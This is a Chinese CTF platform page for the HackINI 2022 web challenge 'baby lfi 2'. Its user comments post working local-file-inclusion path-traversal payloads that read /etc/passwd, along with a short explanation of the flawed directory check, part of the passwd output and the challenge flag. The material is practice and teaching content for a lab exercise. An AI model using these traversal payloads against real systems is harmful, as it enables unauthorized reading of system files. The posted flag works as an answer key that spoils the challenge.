baby lfi 2WEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2022
题目作者: 未知
一  血: Aman
一血奖励: 0金币
解  决: 1992
提  示:
描  述:
What about making things a bit harder ?
评论
868954104 1年前

?language=./languages/../../../../../etc/passwd shellmates{yOU_M4De_yOUr_waY_7hRough_iT}

回复 1

868954104 1年前

shellmates{yOU_M4De_yOUr_waY_7hRough_iT}

回复 1

我说我风华绝代 1年前

下面解析的链接挂了,大概就是后台会验证是不是在当前language目录下,但是没有验证后面../的目录穿越,所以先输入./language/

回复 1

yituoshi 1年前

Half the truth is often a big lie:Look Here !!! root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin

回复 0

逐月 1年前

这篇思路解释的挺详细 http://t.csdnimg.cn/sIZDF

回复 0

bhgctfon 1年前

文件包含漏洞构造网址, ?language=./languages/../../../../etc/passwd

回复 2

qingye 1年前

language=./languages/../../../../etc/passwd

回复 0

zhangye 1年前

直接用伪协议非法,加上languages就可以了

回复 0

老渡真的不懂 1年前

好嘛不能直接访问,要跳来跳去。?language=./languages/../file://../../../../etc/passwd

回复 1

不会编程的崽 1年前

./language../ 为什么有个./

回复 0

WriteUp

image
gushi666

2 金币

评分(4)

解题动态

ivf321 攻破了该题 16小时前
luckylian 攻破了该题 17小时前
17335918325 攻破了该题 1天前
2495280533 攻破了该题 1天前
小白ctf 攻破了该题 1天前
YCanhao 攻破了该题 2天前
zwhnsh 攻破了该题 2天前
swewjk 攻破了该题 2天前
buuble123 攻破了该题 2天前
人闲桂花落 攻破了该题 2天前
wsmemail 攻破了该题 3天前
dahuaaistudy 攻破了该题 3天前
123qq129 攻破了该题 3天前
17661820831 攻破了该题 4天前
18516952839 攻破了该题 4天前
渴死的鱼 攻破了该题 6天前
qwerasdz 攻破了该题 7天前
hsy2078844367 攻破了该题 7天前
wj834722134 攻破了该题 7天前
rachel207 攻破了该题 8天前
问题反馈